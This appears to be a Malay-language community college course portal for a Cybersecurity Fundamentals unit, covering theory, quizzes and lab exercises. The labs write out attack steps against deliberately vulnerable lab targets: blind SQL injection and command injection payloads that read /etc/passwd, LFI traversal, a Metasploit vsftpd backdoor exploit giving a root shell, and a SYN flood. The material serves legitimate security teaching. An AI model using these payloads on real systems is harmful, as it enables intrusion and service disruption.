Pengenalan Kursus

SFC31663 Cybersecurity Fundamentals

Selamat datang ke portal pembelajaran kendiri (SIM) subjek Cybersecurity Fundamentals bagi pelajar Sijil Teknologi Maklumat, Kolej Komuniti Papar.

3 Kredit • Tiada Prasyarat
CLO1: Practical Skills (P3)
CLO2: Digital Skills & Tools (A3)
CLO3: Ethics & Professionalism (A2)

Sinopsis Kursus

Subjek Cybersecurity Fundamentals bertujuan untuk mendedahkan pelajar kepada ancaman dan bahaya keselamatan siber masa kini. Pelajar akan memperoleh pemahaman asas tentang teori keselamatan maklumat, prinsip reka bentuk sistem keselamatan, serta amalan terbaik dalam pengkomputeran yang selamat dan lestari.

Selain daripada teori, kursus ini memfokuskan kepada latihan praktikal (amali) menggunakan alatan keselamatan industri seperti **Nmap, Metasploit, Wireshark,** dan **Autopsy** untuk mengurus persekitaran sistem maklumat organisasi secara selamat.

Hasil Pembelajaran Kursus (CLO)

Di akhir kursus ini, pelajar akan dapat:

  1. CLO 1: Mengikut kemahiran praktikal bagi teknik dan prosedur untuk mengurangkan isu keselamatan. *(P3, PLO3)*
  2. CLO 2: Menunjukkan kemahiran digital dalam ancaman dan bahaya keselamatan siber dengan menggunakan alatan dan teknik yang sesuai untuk persekitaran yang selamat di dalam organisasi. *(A3, PLO6)*
  3. CLO 3: Mengamalkan kod etika profesional untuk menghadapi cabaran sebenar dalam persekitaran keselamatan. *(A2, PLO11)*

Skim Pentaksiran Kursus

Penilaian pelajar terbahagi kepada dua komponen utama:

Kategori Penilaian Komponen Pentaksiran Pemberat Komponen (%) Jumlah Pemberat (%) Hasil Pembelajaran (CLO) yang Dinilai
Penilaian Berterusan (Continuous Assessment - CA) Tugasan Amali / Practical Task 20% 70% CLO 1 (Practical Skills - P3)
Demonstrasi Praktikal / Demonstration 20% CLO 2 (Digital Skills - A3)
Kajian Kes / Case Study 20% CLO 2 (Digital Skills - A3)
Pembentangan / Presentation 10% CLO 3 (Ethics & Professionalism - A2)
Penilaian Akhir (Final Assessment - FA) Peperiksaan Bertulis Akhir 30% 30% CLO 1 (Teori Asas Keselamatan - P3)
CARA MENGGUNAKAN SIM INI
Gunakan grid butang di panel kiri untuk menukar halaman minggu kuliah (Minggu 1 hingga 14). Setiap minggu mengandungi nota teori, panduan amali, aktiviti simulasi interaktif yang menyeronokkan, dan kuiz maklum balas segera untuk menguji pemahaman anda.
KATA-KUNCI
"Keselamatan bukan satu produk, tetapi satu proses." SIM ini direka bagi membimbing anda langkah-demi-langkah ke arah menjadi profesional IT yang peka keselamatan siber. Selamat belajar!
MINGGU 1 • TOPIK 1.1

Asas Keselamatan Siber

Memahami kepentingan pertahanan siber, jenis bidang kajian keselamatan, matlamat keselamatan (CIA Triad), dan kategori penggodam.

Masa Pembelajaran: 2 Jam Kuliah, 3 Jam Amali
CLO 2 (A3)

1.1.1 Bidang Kajian Keselamatan Siber

Keselamatan siber merupakan payung besar yang meliputi pelbagai disiplin untuk mengawal dan mempertahankan aset maklumat organisasi daripada ancaman digital. Terdapat 4 bidang kajian utama:

  • Information Security (Keselamatan Maklumat): Perlindungan keseluruhan maklumat (data) sama ada dalam bentuk digital mahupun fizikal (kertas/fail) daripada diakses tanpa kebenaran.
  • Network Security (Keselamatan Rangkaian): Perlindungan ke over rangkaian komputer, infrastruktur penghantaran data, peranti perantaraan (router, switch) daripada serangan pencerobohan dan kecurian trafik rangkaian.
  • Application Security (Keselamatan Aplikasi): Proses mengukuhkan perisian dan kod aplikasi untuk mencegah eksploitasi kelemahan pepijat (*bug*). Contohnya termasuk pengesahan kod (*code review*) dan pengujian keselamatan dinamik.
  • Operational Security (Keselamatan Operasi): Prosedur, peraturan, dan keputusan pengurusan harian yang menentukan bagaimana aset data dilindungi, diuruskan, atau dilupuskan secara selamat (seperti dasar pelupusan cakera keras).

1.1.2 Matlamat Keselamatan: CIA Triad

Teras utama di sebalik setiap strategi keselamatan IT ialah **Segitiga CIA (CIA Triad)**. Setiap polisi keselamatan dibangunkan untuk menjamin salah satu atau semua objektif ini:

Konsep Penerangan Contoh Serangan / Pelanggaran
Confidentiality (Kerahsiaan) Memastikan maklumat atau data hanya boleh diakses oleh pihak yang sah dan diberikan kebenaran sahaja. Penggodam mencuri fail rekod perubatan pesakit atau kata laluan bank.
Integrity (Integriti) Menjamin data tidak diubah, dipadam, atau dimodifikasi oleh pihak yang tidak bertanggungjawab semasa disimpan mahupun dihantar. Penceroboh mengubah jumlah baki akaun bank atau menukar keputusan peperiksaan pelajar dalam database.
Availability (Ketersediaan) Memastikan sistem, perkhidmatan, dan data sentiasa boleh diakses oleh pengguna yang sah apabila diperlukan. Serangan DDoS menyebabkan laman web portal Kolej Komuniti tidak dapat diakses semasa pendaftaran subjek.

1.1.3 Kategori Penyerang & Penggodam (Hackers)

Penggodam dikelompokkan mengikut niat, kebenaran (etika), dan tahap kemahiran mereka:

  • White Hat Hacker (Penggodam Beretika): Pakar keselamatan yang menggodam dengan kebenaran rasmi organisasi untuk mencari kelemahan bagi memperkukuh sistem (contoh: *Penetration Tester*).
  • Black Hat Hacker (Penggodam Berniat Jahat): Penjenayah siber yang menceroboh sistem komputer tanpa kebenaran bagi motif peribadi, kewangan, sabotaj, atau merosakkan data.
  • Grey Hat Hacker: Penggodam di zon pertengahan. Mereka menggodam sistem tanpa izin (melanggar undang-undang) tetapi tidak mempunyai niat jahat. Biasanya mereka menggodam untuk menunjuk-nunjuk atau meminta ganjaran selepas melaporkan pepijat kepada pemilik sistem.
  • Script Kiddies: Amatur yang mempunyai pengetahuan IT yang terhad. Mereka menggodam semata-mata dengan memuat turun dan menjalankan alat atau skrip siap sedia daripada internet tanpa memahami kod di sebaliknya.
Amali 1: Penggunaan Enkripsi Caesar Cipher (CIA Triad - Kerahsiaan)

Enkripsi adalah kaedah utama menjaga Confidentiality (Kerahsiaan). Mari cuba Caesar Cipher (penjelmaan huruf mengikut kunci anjakan) di bawah:

V VIF31663 FBEHU
Amali 2: Pengujian Kekuatan Kata Laluan (Brute-Force Prevention)

Masukkan kata laluan untuk menguji kekuatannya dalam melindungi kerahsiaan akaun anda:

Tiada Input
Amali 1.3: Blind SQL Injection (Suntikan SQL Buta)

Blind SQL Injection berlaku apabila pangkalan data tidak mengembalikan sebarang ralat atau data di skrin. Penyerang perlu mengagak data secara logik Ya/Tidak atau kelewatan masa.

Pautan Lembaran Kerja: Pelajar boleh memuat turun dan melengkapkan tugasan amali melalui fail lembaran kerja tempatan:
Lembaran_Kerja_Blind_SQLi.md
  1. Layari borang SQL Injection (Blind) di DVWA.
  2. Masukkan input 1' AND 1=1 -- (True) dan 1' AND 1=2 -- (False) untuk melihat perbezaan respon pelayan.
  3. Gunakan arahan kelewatan masa 1' AND sleep(5) -- untuk memaksa pelayan tidur selama 5 saat.
Uji Minda Minggu 1
1. Organisasi X menghadapi serangan di mana penyerang membanjiri pelayan web mereka sehingga ia lumpuh. Matlamat CIA Triad yang manakah telah dicemari?
A) Confidentiality (Kerahsiaan)
B) Integrity (Integriti)
C) Availability (Ketersediaan)
2. Manakah antara berikut menerangkan tentang "Script Kiddies"?
A) Penggodam amatur yang menggunakan skrip dan alatan sedia ada dari internet tanpa pemahaman mendalam.
B) Penggodam profesional yang diupah secara sah oleh syarikat perbankan.
C) Pembuat perisian antivirus.
INGAT!
CIA Triad bukan sekadar konsep teori. Ia adalah cara kita mengukur prestasi dan integriti keseluruhan sistem keselamatan maklumat di dalam mana-mana organisasi.
KATA KUNCI
Confidentiality = Rahsia / Tiada kebocoran.
Integrity = Tulen / Tiada manipulasi.
Availability = Sedia akses / Tiada gangguan.
MINGGU 2 • TOPIK 1.2 & 1.3

Ancaman, Risiko & Perlindungan Malware

Mengenal pasti klasifikasi ancaman siber, proses pengenalpastian risiko peranti, serta perisian perlindungan malware.

Masa Pembelajaran: 2 Jam Kuliah, 3 Jam Amali
CLO 2 (A3)

1.2.1 Jenis-jenis Ancaman Keselamatan

Ancaman (*threat*) merujuk kepada sebarang kemungkinan peristiwa atau tindakan yang boleh menjejaskan keselamatan sistem komputer. Ia dikelaskan kepada 4 jenis utama:

Kategori Ancaman Penerangan ringkas Contoh Senario
Malicious Code (Malware) Perisian hasad yang dicipta untuk merosakkan, mengintip, atau mengganggu peranti tanpa izin. Virus, Worm (cacing komputer), Trojan Horse, Ransomware (minta tebusan).
Hacking (Penggodaman) Eksploitasi teknikal secara aktif untuk mendapatkan akses masuk ke dalam pelayan atau rangkaian tanpa izin. Pencerobohan server pangkalan data sekolah melalui SQL Injection.
Natural Disaster (Bencana Alam) Ancaman fizikal/persekitaran bukan buatan manusia yang mengancam perkakasan server. Banjir yang menenggelamkan server room di tingkat bawah pejabat atau gempa bumi.
Theft (Kecurian) Kecurian secara fizikal ke atas komputer, cakera keras (hard disk), telefon bimbit, atau pita sandaran (backup tape). Pekerja tersalah meletakkan laptop syarikat yang mengandungi data sensitif di stesen bas.

1.2.2 Sumber Ancaman

Ancaman boleh dikategorikan mengikut asalnya:

  • External vs Internal:
    • *External:* Serangan yang datang dari luar organisasi (sindiket jenayah siber, hacker bebas).
    • *Internal:* Ancaman dari dalam organisasi, iaitu kakitangan sendiri yang berniat jahat atau tidak sengaja cuai membocorkan kata laluan (sangat berbahaya kerana mereka sudah mempunyai hak akses asas).
  • Structured vs Unstructured:
    • *Structured:* Serangan terancang, mempunyai objektif khusus, dana besar, dan dilaksanakan oleh pakar (contoh: serangan disokong negara/*State-sponsored*).
    • *Unstructured:* Serangan rawak oleh penggodam amatur yang mencari sasaran mudah berasaskan kelemahan rambang tanpa rancangan khusus.

1.2.3 Proses Pengenalpastian Risiko

Sebelum kita merangka sistem perlindungan, kita perlu menganalisis risiko maklumat melalui formula hubung kait berikut:

Aset (Asset): Apa yang mahu dilindungi? (cth: Database Pelajar)
Ancaman (Threat): Apakah bahaya yang menanti? (cth: Ransomware)
Kelemahan (Vulnerability): Apakah kelompongan pada sistem? (cth: Perisian Windows tidak dikemas kini)
Risiko (Risk): Kebarangkalian kemudaratan berlaku. (Risiko = Ancaman × Kelemahan)

1.3.1 Program Perlindungan Terhadap Kod Hasad

Untuk menangkis kod hasad, kita memerlukan gabungan program perlindungan yang berbeza:

  1. Antivirus: Mengimbas cakera keras dan memori peranti untuk mengesan, mengkuarantin, dan memadam fail malware berasaskan tandatangan digital (*signature-based*) atau tingkah laku peranti (*heuristic*).
  2. Personal Firewall (Tembok Api): Memantau dan menapis trafik rangkaian masuk/keluar ke komputer mengikut tetapan keselamatan (*security policies*). Ia menghalang sambungan port yang tidak dibenarkan.
  3. Intrusion Detection System (IDS): Sistem yang menganalisis aktiviti rangkaian atau hos untuk mengesan jika berlaku tanda-tanda cubaan pencerobohan dan memberikan penggera amaran kepada pentadbir sistem.
Aktiviti Interaktif: Penilaian Risiko Aset IT

Lengkapkan jadual penilaian risiko di bawah dengan memilih padanan **Kelemahan** dan **Kesan** yang paling tepat untuk senario yang diberikan:

Aset IT Ancaman Kelemahan (Pilih) Kesan / Impak (Pilih)
Pelayan Web Portal DDoS Attack
Komputer Pejabat Jangkitan Ransomware
Uji Minda Minggu 2
1. Seorang pekerja IT di dalam organisasi telah memasukkan pemacu kilat (pendrive) yang mengandungi perisian berbahaya ke dalam pelayan utama syarikat secara sengaja. Apakah jenis sumber ancaman ini?
A) Internal & Structured
B) External & Unstructured
C) Natural disaster
AWAS!
Malware tidak boleh dipandang mudah. Worm (cacing) boleh merebak secara automatik dalam rangkaian tanpa sebarang penglibatan manusia!
MINGGU 3 • TOPIK 2.1 & 2.2

Serangan Siber & Kejuruteraan Sosial

Memahami cara klasifikasi serangan siber, jenis serangan yang popular, serta kaedah manipulasi sosial.

Masa Pembelajaran: 2 Jam Kuliah, 3 Jam Amali
CLO 2 (A3)

2.1.1 Pengelasan Serangan

Serangan siber diklasifikasikan berdasarkan tindakan dan cara pencerobohan berlaku:

  • Passive Attacks (Serangan Pasif): Penyerang tidak mengubah sebarang kandungan data atau sistem. Mereka hanya menjejak, memantau, dan membaca aliran trafik maklumat yang sedang dihantar (contoh: *sniffing* kata laluan di Wi-Fi awam). Serangan pasif **sangat sukar dikesan** kerana tiada tanda-tanda fizikal sistem terjejas.
  • Active Attacks (Serangan Aktif): Penyerang memintas, memadam, atau menukar kandungan fail, mesej, dan status operasi sistem. Contohnya termasuk serangan mengubah data transaksi kewangan. Serangan ini lebih mudah dikesan tetapi sukar untuk dihalang ketika ia bermula.
  • Insider Attacks: Serangan yang berpunca daripada pihak di dalam organisasi yang mempunyai akaun sah dan kelayakan akses untuk merosakkan atau mencuri maklumat sensitif.
  • Distribution Attacks: Gangguan atau pemasangan perisian hasad (spyware) ke atas peranti komputer semasa ia dalam proses pembikinan di kilang mahupun sedang diedarkan kepada pengguna.

2.1.2 Jenis Serangan Siber

Berikut adalah kaedah serangan teknikal yang sering dilancarkan oleh penyerang:

  1. Reconnaissance Attack (Serangan Peninjauan): Serangan bertujuan mengumpul maklumat lengkap tentang sasaran sebelum melancarkan serangan utama. Contohnya, menggunakan *Nmap* untuk memetakan alamat IP peranti yang aktif dan port servis yang terbuka.
  2. Denial of Service (DoS) / DDoS: Tindakan melumpuhkan pelayan atau talian rangkaian internet sasaran dengan menghantar limpahan trafik data palsu secara mendadak sehingga pelayan kehabisan memori atau lebar jalur (*bandwidth*).
  3. Access Attack: Serangan untuk memecah masuk ke dalam sistem dengan meneka atau meretas kata laluan (contoh: serangan *Brute-Force* atau *Dictionary Attack*).

2.2.1 Kejuruteraan Sosial (Social Engineering)

Kejuruteraan Sosial ialah satu teknik memanipulasi pemikiran dan psikologi manusia supaya mereka secara sukarela menyerahkan maklumat sensitif atau melanggar dasar keselamatan organisasi. Teknik berasaskan penyamaran (*impersonation*) merangkumi:

  • Impersonation (Vishing - Voice Phishing): Penipuan panggilan telefon di mana penyerang menyamar sebagai wakil polis, LHDN, atau bank untuk mengugut mangsa memindahkan wang segera (contoh: *Macau Scam*).
  • Eavesdropping (Mencuri Dengar): Mencuri maklumat dengan curi-curi mendengar perbualan sensitif pihak lain di tempat awam tanpa disedari.
  • Shoulder Surfing (Melihat Bahu): Tindakan mengintip dari belakang mangsa untuk melihat kata laluan, nombor PIN ATM, atau kod log masuk yang sedang ditaip.
  • Dumpster Diving (Menyelongkar Tong Sampah): Mencari maklumat berharga dengan memeriksa sisa kertas kerja pejabat yang dibuang tanpa dihancurkan (seperti kod IP server atau password yang ditulis pada kertas pelekat).
Alat Interaktif: Cari Tanda Amaran Phishing

Sebahagian besar pancingan maklumat komputer (*Computer-based Phishing*) dihantar melalui e-mel palsu. **Klik pada elemen yang mencurigakan** di dalam e-mel di bawah untuk mengetahui petanda e-mel phishing:

Daripada: CIMB Clicks Support clicks-update@security-alerts-cimb.com
Kepada: pelanggan@gmail.com
Tajuk: AMARAN KESELAMATAN: Akaun Anda Disekat Dalam Tempoh 24 Jam!

Pelanggan yang dihormati,

Kami mendapati terdapat cubaan log masuk asing ke dalam akaun perbankan anda. Sila sahkan maklumat peribadi anda segera dengan menekan butang di bawah untuk mengelakkan akaun anda ditutup secara kekal.

PENGESAHAN AKAUN SEGERA

Terima kasih,
CIMB Clicks Security Team.

Uji Minda Minggu 3
1. Mengapakah serangan jenis "Passive Attack" dikatakan paling sukar untuk dikesan?
A) Kerana penyerang hanya memantau trafik tanpa mengubah sebarang data atau konfigurasi sistem.
B) Kerana ia memadamkan fail log sistem secara automatik.
C) Kerana ia hanya menyasarkan rangkaian fizikal sahaja.
INGAT!
"Shoulder Surfing" boleh berlaku di mana-mana sahaja terutamanya di ATM atau stesen LRT. Sentiasa tutup papan kekunci anda semasa menaip kod PIN!
MINGGU 4 • TOPIK 2.3 (PART 1)

Penyediaan Makmal & Pengenalan Nmap

Membina persekitaran makmal maya yang selamat dan memulakan langkah pemetaan rangkaian menggunakan Nmap.

Masa Pembelajaran: 2 Jam Kuliah, 3 Jam Amali
CLO 1 (P3) • Amali Makmal

Amali 3: Menyediakan Persekitaran Makmal Maya (VM Kali & Metasploitable)

Untuk melaksanakan tugasan amali cybersecurity secara sah dan selamat, kita mesti menggunakan persekitaran yang diasingkan (*isolated laboratory*) menggunakan mesin maya (**Virtual Machine**):

  1. Mesin Penyerang (Attacker VM) - Kali Linux: Pasang Kali Linux menggunakan perisian virtualization seperti **VMware Workstation** atau **VirtualBox**. Kali Linux dimuatkan dengan pelbagai alat pengujian pencerobohan sedia ada. (User/Pass: `kali` / `kali`).
  2. Mesin Sasaran (Victim VM) - Metasploitable 2: Sistem operasi Linux berasaskan Ubuntu yang dibina dengan kelompongan (*vulnerable by design*) yang sengaja dibuka untuk tujuan latihan penggodaman beretika. (User/Pass: `msfadmin` / `msfadmin`).
  3. Konfigurasi Kad Rangkaian (Network Card Configuration): Tetapkan kad rangkaian kedua-dua VM kepada mod **NAT** atau **Host-Only** yang menggunakan subnet yang sama supaya kedua-dua peranti boleh berhubung tanpa mengganggu rangkaian internet fizikal kolej.

Amali 4: Imbasan Rangkaian Menggunakan Netdiscover

Sebaik sahaja makmal sedia, mulakan langkah peninjauan (*reconnaissance*) dengan arahan terminal berikut:

  • sudo netdiscover -r [Subnet/CIDR]: Berfungsi untuk mengimbas rangkaian secara pasif/aktif bagi mencari alamat IP peranti yang sedang aktif di rangkaian. Contoh: `sudo netdiscover -r 192.168.18.0/24`.
  • nmap [IP Sasaran]: Imbasan port lalai (*default scan*) untuk memeriksa senarai port utama yang berstatus *open* (terbuka). Contoh: `nmap 192.168.18.138`.
  • nmap -sV [IP Sasaran]: Melakukan imbasan pengesanan versi (*Version Detection*) bagi mengetahui jenis perisian dan versi servis yang berjalan di setiap port terbuka. Ini amat kritikal untuk membolehkan kita mencari eksploitasi yang sepadan.
  • nmap -A [IP Sasaran]: Imbasan agresif (*Aggressive Scan*) yang mengaktifkan pengesanan sistem operasi (OS detection), pengimbasan skrip keselamatan (NSE scripts), dan trace route rangkaian sekali gus.
Amali 5: Imbasan Port Terbuka & Pengecaman Versi Servis (Nmap Scanner)

Cuba taip arahan imbasan rangkaian berikut pada terminal untuk mensimulasikan Kali Linux:

Arahan disokong: ifconfig, sudo netdiscover -r 192.168.18.0/24, nmap 192.168.18.138, nmap -sV 192.168.18.138, clear
kali@kali: ~
Selamat Datang ke Terminal Kali Linux Simulator! Taip 'help' untuk panduan.
kali@kali:~$
Uji Minda Minggu 4
1. Parameter Nmap yang manakah digunakan khas untuk mengesan versi servis perisian yang sedang berjalan pada port terbuka?
A) nmap -O
B) nmap -sV
C) nmap -sP
AMALI TIPS
Semasa membuat konfigurasi mesin maya, pastikan status sambungan LAN berada pada subnet yang sama (contoh: 192.168.18.xxx) agar arahan ping berjaya ditemui.
MINGGU 5 • TOPIK 2.3 (PART 2)

Eksploitasi Metasploit & Serangan DDoS

Melaksanakan amali eksploitasi kelemahan keselamatan perisian menggunakan Metasploit Framework dan simulasi serangan DDoS.

Masa Pembelajaran: 3 Jam Amali Makmal
CLO 1 (P3) • Amali Makmal

Amali 6: Eksploitasi vsftpd Backdoor Menggunakan Metasploit Framework

Selepas melakukan imbasan Nmap pada Minggu 4, didapati port FTP sasaran (Port 21) sedang menjalankan perisian **vsftpd versi 2.3.4**. Versi ini terkenal kerana dibina dengan *backdoor* (pintu belakang) oleh pihak luar secara haram. Kita boleh memecah masuk menggunakan modul eksploitasi bersesuaian dalam **Metasploit Framework**:

  1. Taip msfconsole di terminal Kali Linux untuk membuka konsol Metasploit.
  2. Cari modul yang relevan dengan menaip search vsftpd 2.3.4. Anda akan melihat modul bernama exploit/unix/ftp/vsftpd_234_backdoor.
  3. Pilih modul tersebut menggunakan arahan use exploit/unix/ftp/vsftpd_234_backdoor (atau use 0).
  4. Tetapkan IP mangsa (Metasploitable) dengan arahan set RHOSTS 192.168.18.138.
  5. Mulakan proses eksploitasi dengan menaip exploit atau run.
  6. Jika berjaya, satu sesi terminal arahan (command shell) mangsa akan diperoleh secara langsung dengan akses tertinggi (**root**). Uji dengan menaip ls atau whoami.

Amali 7: Simulasi Serangan TCP SYN Flood DDoS

Serangan SYN Flood mengebom pelayan sasaran dengan paket TCP SYN (permintaan sambungan awal) tanpa membalas paket SYN-ACK daripada pelayan. Ini menyebabkan penimbal sambungan pelayan menjadi penuh dan menolak pengguna sebenar. Langkah pelaksanaan:

  • Buka Metasploit: msfconsole.
  • Cari modul synflood: use auxiliary/dos/tcp/synflood.
  • Set sasaran (contoh Windows 10 Tiny): set RHOSTS 192.168.18.139.
  • Mulakan serangan dengan menaip exploit. Pelayan sasaran akan terbeban dengan CPU 100% dan tidak lagi mampu bertindak balas.
Amali 5.3: Command Injection (Suntikan Perintah OS)

Menggunakan kelemahan aplikasi web yang membolehkan penyerang menghantar arahan sistem operasi secara terus menerus melalui aksara penyambung seperti ;, & atau &&.

Pautan Lembaran Kerja: Lakukan simulasi serangan OS command injection menggunakan:
Lembaran_Kerja_Command_Injection.md
  1. Pilih menu Command Injection di DVWA.
  2. Masukkan IP 127.0.0.1; whoami untuk melihat pengguna sistem.
  3. Suntik arahan 127.0.0.1; cat /etc/passwd untuk membaca senarai pengguna hos Linux.
Amali 5.4: File Inclusion (LFI / RFI)

LFI membolehkan pembacaan fail tempatan menggunakan directory traversal (../), manakala RFI membolehkan pemuatan fail skrip berbahaya dari internet luar.

Pautan Lembaran Kerja: Amali kemasukan fail sistem boleh dilakukan melalui:
Lembaran_Kerja_File_Inclusion.md
  1. Pilih menu File Inclusion di DVWA.
  2. Manipulasi URL parameter dengan menaip ?page=../../../../etc/passwd.
  3. Lakukan konfigurasi allow_url_include = Off pada php.ini untuk melindungi server.
Simulator Terminal Metasploit (msfconsole)

Alami proses eksploitasi pintu belakang vsftpd secara interaktif. Taip arahan berikut satu persatu:

Urutan: msfconsolesearch vsftpduse exploit/unix/ftp/vsftpd_234_backdoorset RHOSTS 192.168.18.138exploitwhoami
Metasploit Console Simulator
kali@kali:~$ Taip 'msfconsole' untuk mulakan framework pengujian pencerobohan.
kali@kali:~$
Uji Minda Minggu 5
1. Dalam Metasploit, apakah arahan yang digunakan untuk menetapkan alamat IP hos sasaran?
A) set RHOSTS 192.168.18.138
B) set target_ip 192.168.18.138
C) define victim 192.168.18.138
KOD ETIKA
Aktiviti penggodaman hanya boleh dilakukan di persekitaran makmal maya yang telah diasingkan sahaja. Menceroboh sistem awam tanpa kebenaran bertulis adalah salah di sisi Akta Jenayah Komputer 1997 Malaysia!
MINGGU 6 • TOPIK 3.1 & 3.2

Keselamatan Infrastruktur Rangkaian & Fizikal

Mengklasifikasikan zon pertahanan infrastruktur rangkaian IT dan melindunginya secara logikal mahupun fizikal.

Masa Pembelajaran: 2 Jam Kuliah, 3 Jam Amali
CLO 2 (A3) • Pencerahan Komponen

3.1.1 Pengelasan Rangkaian (Security Zoning)

Bagi menghalang serangan luar daripada terus meresap ke rangkaian sulit syarikat, organisasi diasingkan kepada **zon keselamatan** berbeza:

  • External Network (Rangkaian Awam): Kawasan internet luar yang tidak selamat dan berada di luar kawalan organisasi.
  • DMZ (Demilitarized Zone): Zon penampan fizikal atau logikal yang menempatkan pelayan web yang perlu dicapai oleh orang awam (seperti Pelayan Web Portal). Jika pelayan di DMZ digodam, penyerang masih dihalang dari memasuki pangkalan data sulit dalam organisasi oleh firewall sekunder.
  • Internal Network (Rangkaian Intranet): Zon paling selamat yang menempatkan pangkalan data utama, maklumat gaji staf, dan workstation admin. Ia dilindungi dengan ketat daripada akses terus dari luar.

3.1.2 Komponen Pertahanan Utama

  1. Firewalls: Peranti perkakasan atau perisian yang menapis semua paket masuk dan keluar rangkaian mengikut polisi bertulis.
  2. Virtual Private Network (VPN): Mewujudkan terowong data (*tunneling*) yang disulitkan (*encrypted*) bagi membolehkan pekerja mengakses rangkaian internal organisasi secara selamat dari rumah.
  3. Intrusion Detection/Prevention System (IDS/IPS): Memantau trafik rangkaian secara berterusan. IDS akan membunyikan penggera sekiranya mengesan aktiviti mencurigakan, manakala IPS pula boleh mengambil tindakan automatik menyekat serangan tersebut.
  4. Honeypots: Komputer atau rangkaian palsu yang dibina lemah secara sengaja untuk bertindak sebagai umpan bagi menarik minat penggodam mendedahkan taktik mereka, sekali gus melindungi server yang sebenar.

3.2.1 Kawalan Keselamatan Fizikal & Persekitaran

Keselamatan fizikal menghalang pencerobohan zahir secara langsung ke atas bilik server:

  • Access Control (Kawalan Akses): Penggunaan pagar keselamatan, kamera CCTV 24 jam, pengawal keselamatan, pintu kad pintar, atau kawalan biometrik (imbasan anak mata/cap jari).
  • Environmental (Persekitaran): Pemasangan sistem pemadam api berasaskan gas mesra komputer (seperti FM200, bukan air), bilik kebal, penghadang gelombang magnetik (*shielding*), dan unit sandaran kuasa elektrik Uninterruptible Power Supply (UPS) untuk menepis gangguan bekalan elektrik.
Rekabentuk Rangkaian Selamat (DMZ Simulation)

Kelaskan peranti organisasi dengan memilih zon yang betul (DMZ vs Internal vs External):

Zon DMZ (Web/Public-Facing)
Zon Internal (Rangkaian Sulit)
Uji Minda Minggu 6
1. Komponen manakah yang diletakkan secara sengaja bagi memerangkap dan menganalisis pergerakan atau strategi penggodam?
A) DMZ Firewall
B) Honeypot
C) Virtual Private Network (VPN)
KATA KUNCI
DMZ = Buffering / Pelayan luar.
Honeypot = Umpan perangkap.
FM200 = Gas pemadam api server.
MINGGU 7 • TOPIK 3.3

Pengukuhan Aplikasi (Application Hardening)

Mempelajari teknik memperkukuhkan keselamatan aplikasi bagi mengurangkan permukaan serangan siber.

Masa Pembelajaran: 2 Jam Kuliah, 3 Jam Amali
CLO 2 (A3) • Kesediaan Kajian Kes

3.3.1 Konsep Application Hardening

Application Hardening ialah proses mengkonfigurasi dan menaik taraf aplikasi perisian bagi meminimumkan kelemahan (*vulnerabilities*) yang boleh dieksploitasi oleh penyerang. Langkah-langkah hardening merangkumi pemasangan tampalan perisian daripada pengeluar rasmi:

  • Service Packs: Himpunan besar pengemaskinian, pembetulan pepijat, dan penambahbaikan keselamatan yang diuji dan dikeluarkan oleh vendor (seperti Microsoft) secara berkala (contoh: Service Pack 1 Windows 7).
  • Security Patches: Tampalan fail khas berskala kecil yang dilepaskan dengan kadar segera untuk menampal satu kelemahan keselamatan kritikal yang baru ditemui (contoh: patch bagi menutup eksploitasi ransomware WannaCry).
  • Hotfixes: Penyelesaian kod pantas yang diedarkan kepada organisasi atau pelanggan tertentu bagi mengatasi masalah spesifik sebelum kemas kini rasmi dikeluarkan secara meluas.
  • Bug Fix: Skrip pembetulan kod pengaturcaraan untuk mengatasi masalah ralat logika perisian supaya fungsi aplikasi beroperasi dengan lancar.

Fokus Pentaksiran: Panduan Kajian Kes (Case Study)

Minggu ini selaras dengan tarikh penghantaran **Kajian Kes (CA 20% - CLO2)**. Tugasan anda melibatkan penyelesaian senario berikut:

SENARIO KAJIAN KES (TOPIK 3)
Sebuah bank tempatan menyedari bahawa penyerang telah cuba memecah masuk ke dalam rangkaian mereka yang menyimpan fail transaksi sulit kewangan. Siasatan mendedahkan bahawa bank tersebut:
  • 1. Tiada pengelasan zon keselamatan (semua peranti digabungkan sekali).
  • 2. Hanya mempunyai firewall luaran asas tanpa pemantauan log yang agresif.
  • 3. Kawalan bilik server fizikal sangat longgar (pintu tidak dikunci).
  • 4. Sistem OS server tidak dikemas kini (banyak port terbuka yang tidak hardening).

Langkah Penyelesaian yang Perlu Dimuatkan Dalam Video/Slides:

  1. Zoning: Cadangkan pembahagian zon keselamatan (DMZ untuk pelayan web awam, Internal Network untuk pelayan data transaksi kewangan, dan Client WiFi berasingan menggunakan VLAN).
  2. Security Measures: Cadangkan pemasangan IDS/IPS untuk memantau pencerobohan siber secara aktif, dan VPN untuk akses staf dari luar pejabat.
  3. Physical Protection: Cadangkan bilik server dikunci dengan biometrik, dipantau CCTV, dan dipasang alat pemadam api FM200.
  4. System Hardening: Cadangkan penguatkuasaan kata laluan BIOS, menutup port tidak digunakan, dan pemasangan Security Patches/Service Packs secara berkala.
Uji Minda Minggu 7
1. Antara komponen pengemaskinian berikut, yang manakah dikeluarkan khusus dengan kadar segera untuk menampal kelompongan keselamatan yang kritikal?
A) Security Patches
B) Bug Fix
C) Service Packs
TIPS KAJIAN KES
Tugasan Kajian Kes memerlukan anda menghasilkan video pembentangan berdurasi 5-8 minit. Gunakan input nota dari Minggu 6 dan Minggu 7 ini sebagai rujukan utama video anda!
MINGGU 8 • TOPIK 4.1 (PART 1)

Tadbir Urus Keselamatan & Polisi Maklumat

Memahami struktur dasar tadbir urus siber, dan kepentingan klasifikasi sensitiviti maklumat dalam organisasi.

Masa Pembelajaran: 2 Jam Kuliah, 3 Jam Amali
CLO 1 (P3) • Tadbir Urus

4.1.1 Tadbir Urus & Pengurusan Polisi Keselamatan

Tadbir Urus Keselamatan (*Security Governance*) ialah rangka kerja bertulis peringkat pengurusan tertinggi untuk menyelia, meluluskan, dan memantau amalan keselamatan siber organisasi supaya mematuhi undang-undang negara dan standard industri.

4.1.2 Klasifikasi Maklumat (Information Classification)

Melindungi semua fail pejabat dengan tahap perlindungan yang sama rata adalah tidak munasabah dan membazir kos. Oleh itu, data perlu dikategorikan mengikut label sensitiviti masing-masing:

Label Klasifikasi Penerangan Contoh Fail (Kolej Komuniti)
Confidential / Restricted (Confidential) Data paling sensitif. Kebocoran boleh menyebabkan kerugian besar kewangan atau pelanggaran undang-undang negara secara langsung. Kertas soalan peperiksaan akhir, maklumat kad pengenalan & akaun bank pelajar.
Internal Use Only (Dalaman) Boleh dikongsi dengan semua kakitangan Kolej Komuniti, tetapi dilarang dibocorkan kepada orang luar. Minit mesyuarat jawatankuasa akademik kolej, struktur IP rangkaian makmal.
